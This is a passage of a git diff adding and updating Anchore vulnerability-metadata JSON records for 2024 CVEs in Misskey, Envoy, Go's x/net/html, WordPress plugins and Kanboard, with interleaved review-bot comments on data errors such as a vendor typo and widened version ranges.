+ "cpe:2.3:a:spatie:browsershot:*:*:*:*:*:php:*:*"
+ ],
+ "packageName": "spatie/browsershot",
+ "packageType": "php-composer",
+ "product": "spatie/browsershot",
+ "repo": "https://github.com/spatie/browsershot",
+ "vendor": "spatio",
+ "versions": [
+ {
+ "lessThan": "5.0.2",
+ "status": "affected",
+ "version": "0",
+ "versionType": "semver"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-45338.json b/data/anchore/2024/CVE-2024-45338.json
new file mode 100644
index 00000000..41d7203b
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-45338.json
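Review bot: In CVE-2024-21547.json, `"vendor": "spatio"` looks like a typo for `spatie`. The CPE in this record is `cpe:2.3:a:spatie:browsershot:...`, and `packageName`, `product` and `repo` all spell it `spatie`. A vendor string that disagrees with the CPE can make vendor-keyed lookups miss this package, so I would change the line to `"vendor": "spatie",`.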
@@ -0,0 +1,73 @@
+{
+ "additionalMetadata": {
+ "cna": "go",
+ "cveId": "CVE-2024-45338",
+ "description": "An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This could cause a denial of service.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://go.dev/cl/637536",
+ "https://go.dev/issue/70906",
+ "https://groups.google.com/g/golang-announce/c/wSCRmFnNmPA/m/Lvcd0mRMAwAJ",
+ "https://pkg.go.dev/vuln/GO-2024-3333"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T20:38:22.660Z",
+ "dateReserved": "2024-08-27T19:41:58.555Z",
+ "dateUpdated": "2024-12-18T20:38:22.660Z",
+ "digest": "8db68a24455d0e0e796caf0eac80ee0e92d3ed65bb8890308b09f1c3e9971714"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://pkg.go.dev",
+ "cpes": [
+ "cpe:2.3:a:golang:networking:*:*:*:*:*:go:*:*"
+ ],
+ "packageName": "golang.org/x/net/html",
+ "packageType": "go-module",
+ "product": "golang.org/x/net/html",
+ "programRoutines": [
+ {
+ "name": "parseDoctype"
+ },
+ {
+ "name": "htmlIntegrationPoint"
+ },
+ {
+ "name": "inTableIM"
+ },
+ {
+ "name": "inBodyIM"
+ },
+ {
+ "name": "Parse"
+ },
+ {
+ "name": "ParseFragment"
+ },
+ {
+ "name": "ParseFragmentWithOptions"
+ },
+ {
+ "name": "ParseWithOptions"
+ }
+ ],
+ "repo": "https://cs.opensource.google/go/x/net",
+ "vendor": "golang.org/x/net",
+ "versions": [
+ {
+ "lessThan": "0.33.0",
+ "status": "affected",
+ "version": "0",
+ "versionType": "semver"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-49363.json b/data/anchore/2024/CVE-2024-49363.json
new file mode 100644
index 00000000..7ea59295
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-49363.json
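Review bot: In CVE-2024-45338.json, `packageName` is `golang.org/x/net/html`, a package import path, while `packageType` is `go-module` and the `lessThan` bound `0.33.0` is a version of the enclosing module, which the `vendor` field spells `golang.org/x/net`. Scanners that match Go findings on the module path from go.mod or build info would presumably never see `golang.org/x/net/html` as a module name, so this entry may fail to match. Please confirm how consumers resolve this field. If they key on the module, use `"packageName": "golang.org/x/net"` and leave the package-level detail to `programRoutines`.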
@@ -0,0 +1,43 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-49363",
+ "description": "Misskey is an open source, federated social media platform. In affected versions FileServerService (media proxy) in github.com/misskey-dev/misskey 2024.10.1 or earlier did not detect proxy loops, which allows remote actors to execute a self-propagating reflected/amplified distributed denial-of-service via a maliciously crafted note. FileServerService.prototype.proxyHandler did not check incoming requests are not coming from another proxy server. An attacker can execute an amplified denial-of-service by sending a nested proxy request to the server and end the request with a malicious redirect back to another nested proxy request.\nLeading to unbounded recursion until the original request is timed out. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. Users unable to upgrade may configure the reverse proxy to block requests to the proxy with an empty User-Agent header or one containing Misskey/. 
An attacker can not effectively modify the User-Agent header without making another request to the server.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/misskey-dev/misskey/security/advisories/GHSA-gq5q-c77c-v236"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T19:24:34.399Z",
+ "dateReserved": "2024-10-14T13:56:34.810Z",
+ "dateUpdated": "2024-12-18T19:24:34.399Z",
+ "digest": "2acbb92bcce0940e49ce3a7552615cdbaf40fbd84ac47a493d3e104c2d0e97ac"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "misskey-dev/misskey",
+ "product": "misskey",
+ "repo": "https://github.com/misskey-dev/misskey",
+ "vendor": "misskey-dev",
+ "versions": [
+ {
+ "lessThan": "2024.11.0-alpha.3",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-52579.json b/data/anchore/2024/CVE-2024-52579.json
new file mode 100644
index 00000000..c84cc578
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-52579.json
@@ -0,0 +1,43 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-52579",
+ "description": "Misskey is an open source, federated social media platform. Some APIs using `HttpRequestService` do not properly check the target host. This vulnerability allows an attacker to send POST or GET requests to the internal server, which may result in a SSRF attack.It allows an attacker to send POST or GET requests (with some controllable URL parameters) to private IPs, enabling further attacks on internal servers. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/misskey-dev/misskey/security/advisories/GHSA-5q3h-wpfw-hjjw"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T19:22:31.869Z",
+ "dateReserved": "2024-11-14T15:05:46.765Z",
+ "dateUpdated": "2024-12-18T19:22:31.869Z",
+ "digest": "5e211ec2a2eb088f01aa6b345b3509f0c8de0f5c885db36b14604756a20fbb4d"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "misskey-dev/misskey",
+ "product": "misskey",
+ "repo": "https://github.com/misskey-dev/misskey",
+ "vendor": "misskey-dev",
+ "versions": [
+ {
+ "lessThan": "2024.11.0-alpha.3",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-52590.json b/data/anchore/2024/CVE-2024-52590.json
new file mode 100644
index 00000000..86679e40
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-52590.json
@@ -0,0 +1,43 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-52590",
+ "description": "Misskey is an open source, federated social media platform. In affected versions missing validation in `ApRequestService.signedGet` allows an attacker to create fake user profiles that appear to be from a different instance than the one where they actually exist. These profiles can be used to impersonate existing users from the target instance. Vulnerable Misskey instances will accept spoofed users as valid, allowing an attacker to impersonate users on another instance. Attackers have full control of the spoofed user and can post, renote, or otherwise interact like a real account. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/misskey-dev/misskey/security/advisories/GHSA-7vgr-p3vc-p4h2"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T19:21:32.872Z",
+ "dateReserved": "2024-11-14T15:05:46.767Z",
+ "dateUpdated": "2024-12-18T19:21:32.872Z",
+ "digest": "b8c874adb1dc981aa1ed29b6701953216725ec7c5c4d496728877bb5c83da08e"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "misskey-dev/misskey",
+ "product": "misskey",
+ "repo": "https://github.com/misskey-dev/misskey",
+ "vendor": "misskey-dev",
+ "versions": [
+ {
+ "lessThan": "2024.11.0-alpha.3",
+ "status": "affected",
+ "version": "2024.8.0-rc.3",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-52591.json b/data/anchore/2024/CVE-2024-52591.json
new file mode 100644
index 00000000..52b37427
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-52591.json
@@ -0,0 +1,43 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-52591",
+ "description": "Misskey is an open source, federated social media platform. In affected versions missing validation in `ApRequestService.signedGet` and `HttpRequestService.getActivityJson` allows an attacker to create fake user profiles and forged notes. The spoofed users will appear to be from a different instance than the one where they actually exist, and the forged notes will appear to be posted by a different user. Vulnerable Misskey instances will accept the spoofed objects as valid, allowing an attacker to impersonate other users and instances. The attacker retains full control of the spoofed user / note and can interact like a real account. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/misskey-dev/misskey/security/advisories/GHSA-m2gq-69fp-6hv4"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T19:20:31.238Z",
+ "dateReserved": "2024-11-14T15:05:46.767Z",
+ "dateUpdated": "2024-12-18T19:20:31.238Z",
+ "digest": "5e211ec2a2eb088f01aa6b345b3509f0c8de0f5c885db36b14604756a20fbb4d"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "misskey-dev/misskey",
+ "product": "misskey",
+ "repo": "https://github.com/misskey-dev/misskey",
+ "vendor": "misskey-dev",
+ "versions": [
+ {
+ "lessThan": "2024.11.0-alpha.3",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-52592.json b/data/anchore/2024/CVE-2024-52592.json
new file mode 100644
index 00000000..311d39e8
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-52592.json
@@ -0,0 +1,43 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-52592",
+ "description": "Misskey is an open source, federated social media platform. In affected versions missing validation in `ApInboxService.update` allows an attacker to modify the result of polls belonging to another user. No authentication is required, except for a valid signature from any actor on any remote instance. Vulnerable Misskey instances will accept spoofed updates for remote polls. Local polls are unaffected. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/misskey-dev/misskey/security/advisories/GHSA-5h8r-gq97-xv69"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T19:19:17.863Z",
+ "dateReserved": "2024-11-14T15:05:46.768Z",
+ "dateUpdated": "2024-12-18T21:30:10.754Z",
+ "digest": "942aac0c68a5ac5d46431acea26b55d3e3fb29f3a898d4840085dab027d08574"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "misskey-dev/misskey",
+ "product": "misskey",
+ "repo": "https://github.com/misskey-dev/misskey",
+ "vendor": "misskey-dev",
+ "versions": [
+ {
+ "lessThan": "2024.11.0-alpha.3",
+ "status": "affected",
+ "version": "10.92.1",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-52593.json b/data/anchore/2024/CVE-2024-52593.json
new file mode 100644
index 00000000..d047da75
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-52593.json
@@ -0,0 +1,43 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-52593",
+ "description": "Misskey is an open source, federated social media platform.In affected versions missing validation in `NoteCreateService.insertNote`, `ApPersonService.createPerson`, and `ApPersonService.updatePerson` allows an attacker to control the target of any \"origin\" links (such as the \"view on remote instance\" banner). Any HTTPS URL can be set, even if it belongs to a different domain than the note / user. Vulnerable Misskey instances will use the unverified URL for several clickable links, allowing an attacker to conduct phishing or other attacks against remote users. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/misskey-dev/misskey/security/advisories/GHSA-675w-hf2m-qwmj"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T19:17:49.041Z",
+ "dateReserved": "2024-11-14T15:05:46.768Z",
+ "dateUpdated": "2024-12-18T21:31:19.011Z",
+ "digest": "bdc1438689250431d98bf2f44a9b05de677da660f251af55b3fd5bd699234587"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "misskey-dev/misskey",
+ "product": "misskey",
+ "repo": "https://github.com/misskey-dev/misskey",
+ "vendor": "misskey-dev",
+ "versions": [
+ {
+ "lessThan": "2024.11.0-alpha.3",
+ "status": "affected",
+ "version": "12.29.0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-53269.json b/data/anchore/2024/CVE-2024-53269.json
new file mode 100644
index 00000000..09e6ccb2
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-53269.json
@@ -0,0 +1,56 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-53269",
+ "description": "Envoy is a cloud-native high-performance edge/middle/service proxy. When additional address are not ip addresses, then the Happy Eyeballs sorting algorithm will crash in data plane. This issue has been addressed in releases 1.32.2, 1.31.4, and 1.30.8. Users are advised to upgrade. Users unable to upgrade may disable Happy Eyeballs and/or change the IP configuration.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/envoyproxy/envoy/pull/37743/commits/3f62168d86aceb90f743f63b50cc711710b1c401",
+ "https://github.com/envoyproxy/envoy/security/advisories/GHSA-mfqp-7mmj-rm53"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T19:12:17.033Z",
+ "dateReserved": "2024-11-19T20:08:14.482Z",
+ "dateUpdated": "2024-12-18T21:36:18.888Z",
+ "digest": "1e3f31720798dea9af04403fc63677ab42aad4d5a8a89f52f1397b0528304b67"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "envoyproxy/envoy",
+ "product": "envoy",
+ "repo": "https://github.com/envoyproxy/envoy",
+ "vendor": "envoyproxy",
+ "versions": [
+ {
+ "lessThan": "1.32.2",
+ "status": "affected",
+ "version": "1.32.0",
+ "versionType": "custom"
+ },
+ {
+ "lessThan": "1.31.4",
+ "status": "affected",
+ "version": "1.31.0",
+ "versionType": "custom"
+ },
+ {
+ "lessThan": "1.30.8",
+ "status": "affected",
+ "version": "1.30.0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-53270.json b/data/anchore/2024/CVE-2024-53270.json
new file mode 100644
index 00000000..7da3f68b
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-53270.json 
@@ -0,0 +1,62 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-53270", + "description": "Envoy is a cloud-native high-performance edge/middle/service proxy. In affected versions `sendOverloadError` is going to assume the active request exists when `envoy.load_shed_points.http1_server_abort_dispatch` is configured. If `active_request` is nullptr, only onMessageBeginImpl() is called. However, the `onMessageBeginImpl` will directly return ok status if the stream is already reset leading to the nullptr reference. The downstream reset can actually happen during the H/2 upstream reset. As a result envoy may crash. This issue has been addressed in releases 1.32.3, 1.31.5, 1.30.9, and 1.29.12. Users are advised to upgrade. Users unable to upgrade may disable `http1_server_abort_dispatch` load shed point and/or use a high threshold.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/envoyproxy/envoy/pull/37743/commits/6cf8afda956ba67c9afad185b962325a5242ef02", + "https://github.com/envoyproxy/envoy/security/advisories/GHSA-q9qv-8j52-77p3" + ], + "upstream": { + "datePublished": "2024-12-18T19:12:18.775Z", + "dateReserved": "2024-11-19T20:08:14.482Z", + "dateUpdated": "2024-12-18T21:35:24.476Z", + "digest": "2742c3f383a7f8ca836773cd97a1a4b2e88d7a139b79e5dce4ad6e21422a6491" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*" + ], + "packageName": "envoyproxy/envoy", + "product": "envoy", + "repo": "https://github.com/envoyproxy/envoy", + "vendor": "envoyproxy", + "versions": [ + { + "lessThan": "1.32.3", + "status": "affected", + "version": "1.32.0", + "versionType": "custom" + }, + { + "lessThan": "1.31.5", + "status": "affected", + "version": "1.31.0", + "versionType": "custom" + }, + { + "lessThan": "1.30.9", + "status": "affected", + "version": "1.30.0", + "versionType": "custom" + }, + { + 
"lessThan": "1.29.12", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-53271.json b/data/anchore/2024/CVE-2024-53271.json new file mode 100644 index 00000000..816cbc45 --- /dev/null +++ b/data/anchore/2024/CVE-2024-53271.json 
@@ -0,0 +1,50 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-53271",
+ "description": "Envoy is a cloud-native high-performance edge/middle/service proxy. In affected versions envoy does not properly handle http 1.1 non-101 1xx responses. This can lead to downstream failures in networked devices. This issue has been addressed in versions 1.31.5 and 1.32.3. Users are advised to upgrade. There are no known workarounds for this issue.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/envoyproxy/envoy/commit/da56f6da63079baecef9183436ee5f4141a59af8",
+ "https://github.com/envoyproxy/envoy/security/advisories/GHSA-rmm5-h2wv-mg4f"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T19:12:20.612Z",
+ "dateReserved": "2024-11-19T20:08:14.482Z",
+ "dateUpdated": "2024-12-18T21:34:22.425Z",
+ "digest": "f5281098cd31f84f3cf35b985a632346ac408c9310c4bc700a5aed4c889d7c10"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "envoyproxy/envoy",
+ "product": "envoy",
+ "repo": "https://github.com/envoyproxy/envoy",
+ "vendor": "envoyproxy",
+ "versions": [
+ {
+ "lessThan": "1.31.5",
+ "status": "affected",
+ "version": "1.31.0",
+ "versionType": "custom"
+ },
+ {
+ "lessThan": "1.32.3",
+ "status": "affected",
+ "version": "1.32.0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-54265.json b/data/anchore/2024/CVE-2024-54265.json
index b02cc069..af6e4844 100644
--- a/data/anchore/2024/CVE-2024-54265.json
+++ b/data/anchore/2024/CVE-2024-54265.json
@@ -31,7 +31,7 @@
 "vendor": "UkrSolution",
 "versions": [
 {
- "lessThanOrEqual": "1.6.6",
+ "lessThan": "1.6.7",
 "status": "affected",
 "version": "0",
 "versionType": "custom"
@@ -42,6 +42,11 @@
 "providerMetadata": {
 "orgId": "00000000-0000-4000-8000-000000000000",
 "shortName": "anchoreadp"
- }
+ },
+ "references": [
+ {
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9faf3293-191c-48fb-a932-d61325d6c2e0?source=cve"
+ }
+ ]
 }
 }
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-54266.json b/data/anchore/2024/CVE-2024-54266.json
index 3c92184c..100c554c 100644
--- a/data/anchore/2024/CVE-2024-54266.json
+++ b/data/anchore/2024/CVE-2024-54266.json
@@ -31,7 +31,7 @@
 "vendor": "ImageRecycle",
 "versions": [
 {
- "lessThanOrEqual": "3.1.16",
+ "lessThan": "3.1.17",
 "status": "affected",
 "version": "0",
 "versionType": "custom"
@@ -42,6 +42,11 @@
 "providerMetadata": {
 "orgId": "00000000-0000-4000-8000-000000000000",
 "shortName": "anchoreadp"
- }
+ },
+ "references": [
+ {
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3947d20c-7e92-43d6-83cc-59efe1049799?source=cve"
+ }
+ ]
 }
 }
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-54267.json b/data/anchore/2024/CVE-2024-54267.json
index 67f24719..64c2a49e 100644
--- a/data/anchore/2024/CVE-2024-54267.json
+++ b/data/anchore/2024/CVE-2024-54267.json
@@ -31,7 +31,7 @@
 "vendor": "CreativeMindsSolutions",
 "versions": [
 {
- "lessThanOrEqual": "3.2.6",
+ "lessThan": "3.2.7",
 "status": "affected",
 "version": "0",
 "versionType": "custom"
@@ -42,6 +42,11 @@
 "providerMetadata": {
 "orgId": "00000000-0000-4000-8000-000000000000",
 "shortName": "anchoreadp"
- }
+ },
+ "references": [
+ {
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91a20180-871b-4208-b11e-d3ff2a7e8d23?source=cve"
+ }
+ ]
 }
 }
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-54268.json b/data/anchore/2024/CVE-2024-54268.json
index 8497b28c..93982b8c 100644
--- a/data/anchore/2024/CVE-2024-54268.json
+++ b/data/anchore/2024/CVE-2024-54268.json
@@ -28,7 +28,7 @@
 "vendor": "SiteOrigin",
 "versions": [
 {
- "lessThanOrEqual": "1.64.0",
+ "lessThan": "1.64.1",
 "status": "affected",
 "version": "0",
 "versionType": "custom"
@@ -39,6 +39,11 @@
 "providerMetadata": {
 "orgId": "00000000-0000-4000-8000-000000000000",
 "shortName": "anchoreadp"
- }
+ },
+ "references": [
+ {
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6864382e-7a45-413c-a80e-a5dd827fe6c7?source=cve"
+ }
+ ]
 }
 }
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-54289.json b/data/anchore/2024/CVE-2024-54289.json
index 232599d3..c96ad4eb 100644
--- a/data/anchore/2024/CVE-2024-54289.json
+++ b/data/anchore/2024/CVE-2024-54289.json
@@ -40,6 +40,11 @@
 "providerMetadata": {
 "orgId": "00000000-0000-4000-8000-000000000000",
 "shortName": "anchoreadp"
- }
+ },
+ "references": [
+ {
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6424c34a-a4cd-49fc-a6d4-b2bbd9dcb42c?source=cve"
+ }
+ ]
 }
 }
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-54298.json b/data/anchore/2024/CVE-2024-54298.json
index bccf39e4..5a4b6d25 100644
--- a/data/anchore/2024/CVE-2024-54298.json
+++ b/data/anchore/2024/CVE-2024-54298.json
@@ -31,7 +31,7 @@
 "vendor": "Bill Minozzi",
 "versions": [
 {
- "lessThanOrEqual": "4.46",
+ "lessThan": "4.48",
 "status": "affected",
 "version": "0",
 "versionType": "custom"
@@ -42,6 +42,11 @@
 "providerMetadata": {
 "orgId": "00000000-0000-4000-8000-000000000000",
 "shortName": "anchoreadp"
- }
+ },
+ "references": [
+ {
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ddd1ccda-e96a-4dd7-a68f-b42c40619bf6?source=cve"
+ }
+ ]
 }
 }
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-54323.json b/data/anchore/2024/CVE-2024-54323.json
index a4a64c61..4a186864 100644
--- a/data/anchore/2024/CVE-2024-54323.json
+++ b/data/anchore/2024/CVE-2024-54323.json
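Review bot: In the CVE-2024-54298 hunk the bound moves from `"lessThanOrEqual": "4.46"` to `"lessThan": "4.48"`, which newly marks 4.47 as affected, whereas the sibling records in this commit move to the immediately following release (1.6.6 to 1.6.7, 3.1.16 to 3.1.17, 1.64.0 to 1.64.1). The CVE-2024-54323 hunk that follows does the same with 2.6.2 to 2.6.4, pulling in 2.6.3. A wider range changes what a scanner reports for installed versions, so it should be traceable: if the added Wordfence reference is the source, say so in the record's rationale text (presumably a `reason` field outside these hunks, as in the new records), otherwise confirm 4.47 and 2.6.3 are unpatched before widening the match.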
@@ -31,7 +31,7 @@
 "vendor": "WPExpertsio",
 "versions": [
 {
- "lessThanOrEqual": "2.6.2",
+ "lessThan": "2.6.4",
 "status": "affected",
 "version": "0",
 "versionType": "custom"
@@ -42,6 +42,11 @@
 "providerMetadata": {
 "orgId": "00000000-0000-4000-8000-000000000000",
 "shortName": "anchoreadp"
- }
+ },
+ "references": [
+ {
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c00e07a-7a0b-4cfa-8f6b-b03e3b485f07?source=cve"
+ }
+ ]
 }
 }
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-54326.json b/data/anchore/2024/CVE-2024-54326.json
index 738c9150..21fd8c3d 100644
--- a/data/anchore/2024/CVE-2024-54326.json
+++ b/data/anchore/2024/CVE-2024-54326.json
@@ -31,7 +31,7 @@
 "vendor": "Eyal Fitoussi",
 "versions": [
 {
- "lessThanOrEqual": "4.5.0.4",
+ "lessThan": "4.5.1",
 "status": "affected",
 "version": "0",
 "versionType": "custom"
@@ -42,6 +42,11 @@
 "providerMetadata": {
 "orgId": "00000000-0000-4000-8000-000000000000",
 "shortName": "anchoreadp"
- }
+ },
+ "references": [
+ {
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f7626b3-86b5-4aa2-871b-07f84a43c47f?source=cve"
+ }
+ ]
 }
 }
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-55603.json b/data/anchore/2024/CVE-2024-55603.json
new file mode 100644
index 00000000..54242eea
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-55603.json
@@ -0,0 +1,50 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-55603", + "description": "Kanboard is project management software that focuses on the Kanban methodology. In affected versions sessions are still usable even though their lifetime has exceeded. Kanboard implements a cutom session handler (`app/Core/Session/SessionHandler.php`), to store the session data in a database. Therefore, when a `session_id` is given, kanboard queries the data from the `sessions` sql table. At this point, it does not correctly verify, if a given `session_id` has already exceeded its lifetime (`expires_at`).\nThus, a session which's lifetime is already `> time()`, is still queried from the database and hence a valid login. The implemented **SessionHandlerInterface::gc** function, that does remove invalid sessions, is called only **with a certain probability** (_Cleans up expired sessions. Called by `session_start()`, based on `session.gc_divisor`, `session.gc_probability` and `session.gc_maxlifetime` settings_) accordingly to the php documentation. In the official Kanboard docker image these values default to: session.gc_probability=1, session.gc_divisor=1000. Thus, an expired session is only terminated with probability 1/1000. This issue has been addressed in release 1.2.43 and all users are advised to upgrade. 
